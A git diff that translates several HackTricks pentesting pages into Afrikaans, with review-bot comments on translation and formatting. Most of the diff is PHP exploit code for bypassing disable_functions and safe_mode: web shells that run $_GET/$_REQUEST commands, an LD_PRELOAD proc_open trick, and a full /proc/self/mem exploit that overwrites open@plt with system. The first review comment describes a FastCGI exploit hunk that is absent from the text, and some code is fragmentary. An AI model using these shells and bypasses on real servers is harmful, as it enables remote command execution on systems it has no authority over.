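Review bot: the `@@ -418,44 +415,132 @@` hunk rewrites identifiers and string literals inside the fenced PHP, which breaks the exploit client: `public function request(array $params, $stdin)` becomes `public function versoek(array $params, $stdin)`, the body now calls `$this->verbind()`, `$this->bouPakket(...)`, `$this->bouNvpaar(...)` and `$this->leesPakket()`, and the call site becomes `echo $client->versoek($params, $code)."\n";`. Unless an earlier hunk renamed the definitions of `connect`, `buildPacket`, `buildNvpair` and `readPacket` to match (none is visible here), every call to `$client->versoek()` dies on an undefined method; the translated `'Slegte versoek'` and `[CANT_MPX_CONN]` exception messages and the `// php payload -- Doen niks nie` comment show the same pattern. Exclude everything between the ``` fences from the translation step and keep the code byte-identical to the source, so that only the prose (the `Met behulp van die vorige funksie ...` paragraph, the two `NOTA` paragraphs and the CVE-2019-11043 section, all of which read fine) changes. Secondary point on the footer at the end of this hunk: the same boilerplate is rendered differently in each file of this patch (`github-opslag` here, `github-repos`, `GitHub-opslagplekke` and `github-opslagplekke` in the pages below, `haktruuks` here versus `hacking-truuks` elsewhere, and two wordings of the first bullet); translate the shared header and footer once and apply them from a single template instead of re-translating the block per file.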
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md index dad169320..03df5722f 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# PHP <= 5.2.9 on windows +# PHP <= 5.2.9 op Windows -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) {% tabs %} {% tab title="exploit.php" %} @@ -25,42 +23,42 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog abysssec.txt"."\r\n"); - fwrite($batch,"exit"); - fclose($batch); - exec("\start cmd.bat"); - echo "
"; - echo "

Abysssec.com PHP <= 5.2.9 SafeMod Bypasser

"; - echo ""; - echo "
"; - } +$cmd = $_REQUEST['cmd']; +if ($cmd){ +$batch = fopen ("cmd.bat","w"); +fwrite($batch,"$cmd>abysssec.txt"."\r\n"); +fwrite($batch,"exit"); +fclose($batch); +exec("\start cmd.bat"); +echo "
"; +echo "

Abysssec.com PHP <= 5.2.9 SafeMod Bypasser

"; +echo ""; +echo "
"; +} ?> @@ -74,8 +72,6 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog ``` -{% endtab %} - {% tab title="cmd.bat" %} ``` dir > abyss.txt @@ -88,16 +84,14 @@ exit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
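Review bot: the `@@ -74,8 +72,6 @@` hunk deletes `{% endtab %}` and the blank line after it between the closing fence of the `exploit.php` tab and `{% tab title="cmd.bat" %}`, so the first tab is never closed and the `{% tabs %}` block no longer nests correctly; restore both removed lines. In `@@ -25,42 +23,42 @@` the only change to the PHP is stripped indentation (`- fwrite($batch,"exit");` becomes `+fwrite($batch,"exit");`, and likewise for every other line of the script), which is whitespace churn inside a fenced block with nothing to translate; keep the code exactly as in the source so this file's diff shows only the translated heading, `Vanaf` line and footer.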
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index b42671c21..0129f9600 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -1,27 +1,24 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# PHP Perl Extension Safe\_mode Bypass Exploit - -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +# PHP Perl-uitbreiding Safe\_mode Bypass Exploit +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php eval("system('".$_GET['cmd']."')"); echo "</textarea>"; $_GET['cmd']=htmlspecialchars($_GET['cmd']); echo "
CMD:
" - + ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
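Review bot: in `@@ -1,27 +1,24 @@` the blank line between the heading and the source attribution is dropped (`-# PHP Perl Extension Safe\_mode Bypass Exploit`, `-`, `-From ...` become `+# PHP Perl-uitbreiding Safe\_mode Bypass Exploit` immediately followed by `+Vanaf ...`), while the windows page above keeps it; keep the blank line after the heading for consistency. The title is also only half translated (`Extension` becomes `Perl-uitbreiding`, `Safe\_mode Bypass Exploit` stays English); either translate the whole title or leave the exploit name as the source has it. The `eval("system('".$_GET['cmd']."')")` block itself is correctly untouched.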
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md index 502a57324..29b89ad19 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# PHP safe\_mode bypass via proc\_open\(\) and custom environment Exploit - -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +# PHP safe\_mode-bypass via proc\_open\(\) en aangepaste omgewing Exploit +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php array("pipe", "r"), - 1 => array("file", $path."/output.txt","w"), - 2 => array("file", $path."/errors.txt", "a" ) +1 => array("file", $path."/output.txt","w"), +2 => array("file", $path."/errors.txt", "a" ) ); $cwd = '.'; $env = array('LD_PRELOAD' => $path."/a.so"); $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); echo ""; while (!feof($a)) @@ -30,21 +27,16 @@ while (!feof($a)) ?>; ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
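Review bot: the code changes in `@@ -1,28 +1,25 @@` and `@@ -30,21 +27,16 @@` are re-indentation only (`- 1 => array("file", $path."/output.txt","w"),` becomes `+1 => array("file", $path."/output.txt","w"),`, and the same for the `2 =>` entry and the loop body), which loses the alignment of the `$descriptorspec` array and adds nothing to the translation; leave fenced code out of the translator's scope. This hunk also drops the blank line after the heading, as the perl page does, and leaves `Exploit` untranslated in `PHP safe\_mode-bypass via proc\_open\(\) en aangepaste omgewing Exploit`; apply the same heading convention across the pages in this patch.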
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md index 7fdd12b7d..7af73e434 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md @@ -1,24 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# via mem -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php > 32; - $lower = $value & 0x00000000ffffffff; - return pack('V2', $lower, $higher); +$higher = ($value & 0xffffffff00000000) >> 32; +$lower = $value & 0x00000000ffffffff; +return pack('V2', $lower, $higher); } function unp($value) { - return hexdec(bin2hex(strrev($value))); +return hexdec(bin2hex(strrev($value))); } function parseelf($bin_ver, $rela = false) { - $bin = file_get_contents($bin_ver); - $e_shoff = unp(substr($bin, 0x28, 8)); - $e_shentsize = unp(substr($bin, 0x3a, 2)); - $e_shnum = unp(substr($bin, 0x3c, 2)); - $e_shstrndx = unp(substr($bin, 0x3e, 2)); - for($i = 0; $i < $e_shnum; $i += 1) { - $sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4)); - if($sh_type == 11) { // SHT_DYNSYM - $dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); - $dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); - $dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); - } - elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB - $strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); - $strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); - } - elseif($rela && $sh_type == 4) { // SHT_RELA - $relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); - $relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); - $relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); - } - } - if($rela) { - for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) { - $r_offset = unp(substr($bin, $i, 8)); - $r_info = unp(substr($bin, $i + 8, 8)) >> 32; - $name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4)); - 
$name = ''; - $j = $strtab_off + $name_off - 1; - while($bin[++$j] != "\0") { - $name .= $bin[$j]; - } - if($name == 'open') { - return $r_offset; - } - } - } - else { - for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) { - $name_off = unp(substr($bin, $i, 4)); - $name = ''; - $j = $strtab_off + $name_off - 1; - while($bin[++$j] != "\0") { - $name .= $bin[$j]; - } - if($name == '__libc_system') { - $system_offset = unp(substr($bin, $i + 8, 8)); - } - if($name == '__open') { - $open_offset = unp(substr($bin, $i + 8, 8)); - } - } - return array($system_offset, $open_offset); - } +$bin = file_get_contents($bin_ver); +$e_shoff = unp(substr($bin, 0x28, 8)); +$e_shentsize = unp(substr($bin, 0x3a, 2)); +$e_shnum = unp(substr($bin, 0x3c, 2)); +$e_shstrndx = unp(substr($bin, 0x3e, 2)); +for($i = 0; $i < $e_shnum; $i += 1) { +$sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4)); +if($sh_type == 11) { // SHT_DYNSYM +$dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); +$dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); +$dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); +} +elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB +$strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); +$strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); +} +elseif($rela && $sh_type == 4) { // SHT_RELA +$relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); +$relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); +$relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); +} +} +if($rela) { +for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) { +$r_offset = unp(substr($bin, $i, 8)); +$r_info = unp(substr($bin, $i + 8, 8)) >> 32; +$name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4)); +$name = ''; +$j = $strtab_off + $name_off - 1; +while($bin[++$j] != 
"\0") { +$name .= $bin[$j]; +} +if($name == 'open') { +return $r_offset; +} +} +} +else { +for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) { +$name_off = unp(substr($bin, $i, 4)); +$name = ''; +$j = $strtab_off + $name_off - 1; +while($bin[++$j] != "\0") { +$name .= $bin[$j]; +} +if($name == '__libc_system') { +$system_offset = unp(substr($bin, $i + 8, 8)); +} +if($name == '__open') { +$open_offset = unp(substr($bin, $i + 8, 8)); +} +} +return array($system_offset, $open_offset); +} } echo "[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)\n"; if(strpos(php_uname('a'), 'x86_64') === false) { - echo "[-] This exploit is for x64 Linux. Exiting\n"; - exit; +echo "[-] This exploit is for x64 Linux. Exiting\n"; +exit; } if(substr(php_uname('r'), 0, 4) < 2.98) { - echo "[-] Too old kernel (< 2.98). Might not work\n"; +echo "[-] Too old kernel (< 2.98). Might not work\n"; } echo "[*] Trying to get open@plt offset in PHP binary\n"; $open_php = parseelf('/proc/self/exe', true); if($open_php == 0) { - echo "[-] Failed. Exiting\n"; - exit; +echo "[-] Failed. Exiting\n"; +exit; } echo '[+] Offset is 0x' . dechex($open_php) . "\n"; $maps = file_get_contents('/proc/self/maps'); @@ -124,8 +121,8 @@ echo "[*] Libc location: $r[1]\n"; echo "[*] Trying to get open and system symbols from Libc\n"; list($system_offset, $open_offset) = parseelf($r[1]); if($system_offset == 0 or $open_offset == 0) { - echo "[-] Failed. Exiting\n"; - exit; +echo "[-] Failed. Exiting\n"; +exit; } echo "[+] Got them. Seeking for address in memory\n"; $mem = fopen('/proc/self/mem', 'rb'); @@ -139,27 +136,22 @@ echo "[*] Rewriting open@plt address\n"; $mem = fopen('/proc/self/mem', 'wb'); fseek($mem, $open_php); if(fwrite($mem, packlli($system_addr))) { - echo "[+] Address written. Executing cmd\n"; - readfile('/usr/bin/id'); - exit; +echo "[+] Address written. Executing cmd\n"; +readfile('/usr/bin/id'); +exit; } echo "[-] Write failed. Exiting\n"; ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
